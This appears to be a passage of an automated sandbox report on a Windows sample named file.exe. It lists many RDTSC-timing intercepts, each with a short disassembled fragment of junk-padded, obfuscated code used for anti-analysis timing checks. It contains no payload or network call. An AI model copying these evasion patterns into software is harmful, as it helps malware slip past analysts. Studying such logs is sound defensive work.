              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B2C second address: 8A5B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B32 second address: 8A5B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B36 second address: 8A5B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B3A second address: 8A5B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B48 second address: 8A5B4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B4C second address: 8A5B52 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B52 second address: 8A5B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F9284AFDC91h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5B71 second address: 8A5B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5CD7 second address: 8A5CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5CDD second address: 8A5CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5CE1 second address: 8A5CE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5CE7 second address: 8A5CF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F92851B8946h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A5CF5 second address: 8A5D0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC96h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A618C second address: 8A6193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A6193 second address: 8A61AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9284AFDC96h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A61AF second address: 8A61B5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 8A7A92 second address: 8A7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9284AFDC86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d js 00007F9284AFDC88h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A7AA7 second address: 8A7AB3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F92851B894Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A98B0 second address: 8A98DD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9284AFDC8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F9284AFDC8Eh 0x00000011 push eax 0x00000012 jo 00007F9284AFDC86h 0x00000018 pop eax 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d pushad 0x0000001e pushad 0x0000001f jnp 00007F9284AFDC86h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8A98DD second address: 8A9918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F92851B8948h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push ebx 0x0000000f jc 00007F92851B8956h 0x00000015 jmp 00007F92851B8950h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 pushad 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 push edx 0x00000024 pop edx 0x00000025 popad 0x00000026 jnp 00007F92851B894Ch 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AA50A second address: 8AA552 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F9284AFDC88h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 and esi, dword ptr [ebp+122D3CF5h] 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e jg 00007F9284AFDC98h 0x00000034 jmp 00007F9284AFDC92h 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB60F second address: 8AB613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF50 second address: 8ABF7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F9284AFDC96h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jp 00007F9284AFDC8Ch 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AB613 second address: 8AB61D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F92851B8946h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AC7AE second address: 8AC7B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF7D second address: 8ABF83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD0AD second address: 8AD0B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF83 second address: 8ABF87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD3DF second address: 8AD3E9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD0B3 second address: 8AD0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F92851B8946h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AD3E9 second address: 8AD3F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ADEF4 second address: 8ADEFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8AE748 second address: 8AE74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4247 second address: 8B4251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B4251 second address: 8B4255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B6342 second address: 8B6346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B73AF second address: 8B73BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F9284AFDC8Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B73BD second address: 8B7408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a jnp 00007F92851B894Ch 0x00000010 add edi, 6C2B8234h 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D1C46h], eax 0x0000001e xchg eax, esi 0x0000001f jmp 00007F92851B894Ah 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 jc 00007F92851B8946h 0x0000002e jmp 00007F92851B8957h 0x00000033 popad 0x00000034 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B85D6 second address: 8B8647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F9284AFDC88h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 sbb bl, FFFFFFE0h 0x0000002a mov edi, ecx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007F9284AFDC88h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 sub dword ptr [ebp+122D347Ch], edi 0x0000004e push 00000000h 0x00000050 sub edi, dword ptr [ebp+1245B86Eh] 0x00000056 push eax 0x00000057 push ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B8647 second address: 8B864B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B864B second address: 8B864F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA80F second address: 8BA89D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8953h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D1C5Bh], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F92851B8948h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F92851B8948h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a xchg eax, esi 0x0000004b jmp 00007F92851B8954h 0x00000050 push eax 0x00000051 pushad 0x00000052 jmp 00007F92851B894Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA89D second address: 8BA8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 868D15 second address: 868D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BCEF0 second address: 8BCEF5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDDF4 second address: 8BDDF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDDF8 second address: 8BDE05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BDE05 second address: 8BDE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BA9F1 second address: 8BA9F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEDB5 second address: 8BEDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BEDB9 second address: 8BEDBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD0E5 second address: 8BD0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BD0EC second address: 8BD0F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFDD3 second address: 8BFDE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F92851B894Eh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863B7B second address: 863B9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F9284AFDC86h 0x0000000e jmp 00007F9284AFDC8Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863B9A second address: 863BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BA3 second address: 863BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BA9 second address: 863BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 863BAD second address: 863BB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C242E second address: 8C2432 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2432 second address: 8C2436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C2436 second address: 8C243C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C3477 second address: 8C34CC instructions: 0x00000000 rdtsc 0x00000002 js 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F9284AFDC88h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 jmp 00007F9284AFDC8Bh 0x0000002d push 00000000h 0x0000002f mov bh, dl 0x00000031 push 00000000h 0x00000033 mov edi, dword ptr [ebp+122D2A40h] 0x00000039 push eax 0x0000003a pushad 0x0000003b ja 00007F9284AFDC8Ch 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4679 second address: 8C4709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B8950h 0x00000009 popad 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F92851B8948h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov ebx, 58391709h 0x0000002d jmp 00007F92851B8953h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F92851B8948h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e mov ebx, 4A2CAC56h 0x00000053 push 00000000h 0x00000055 and ebx, 4E95189Eh 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e push edx 0x0000005f jmp 00007F92851B894Ch 0x00000064 pop edx 0x00000065 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4709 second address: 8C4729 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9284AFDC88h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9284AFDC90h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C4729 second address: 8C4732 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C66B1 second address: 8C66B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C66B7 second address: 8C66C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8C66C5 second address: 8C66C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8BFF0A second address: 8BFF27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jbe 00007F92851B894Eh 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAE04 second address: 8CAE0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CAE0A second address: 8CAE34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F92851B8946h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F92851B8955h 0x00000010 popad 0x00000011 pushad 0x00000012 jl 00007F92851B8946h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8CD4CA second address: 8CD4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jns 00007F9284AFDC86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D1666 second address: 8D166C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D04 second address: 8D0D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D0F second address: 8D0D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D13 second address: 8D0D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D0D17 second address: 8D0D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8605B0 second address: 8605B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DA31D second address: 8DA321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAA55 second address: 8DAA77 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jnl 00007F9284AFDC86h 0x00000014 jmp 00007F9284AFDC8Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAA77 second address: 8DAA8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F92851B894Ah 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAEAB second address: 8DAEB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DAEB6 second address: 8DAEC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F92851B894Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB16B second address: 8DB19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F9284AFDC86h 0x00000009 jmp 00007F9284AFDC94h 0x0000000e jmp 00007F9284AFDC94h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB2EC second address: 8DB343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F92851B8957h 0x0000000d jo 00007F92851B8946h 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 jmp 00007F92851B894Fh 0x0000001b popad 0x0000001c pushad 0x0000001d push ecx 0x0000001e jmp 00007F92851B894Ah 0x00000023 pop ecx 0x00000024 jmp 00007F92851B894Eh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB343 second address: 8DB347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
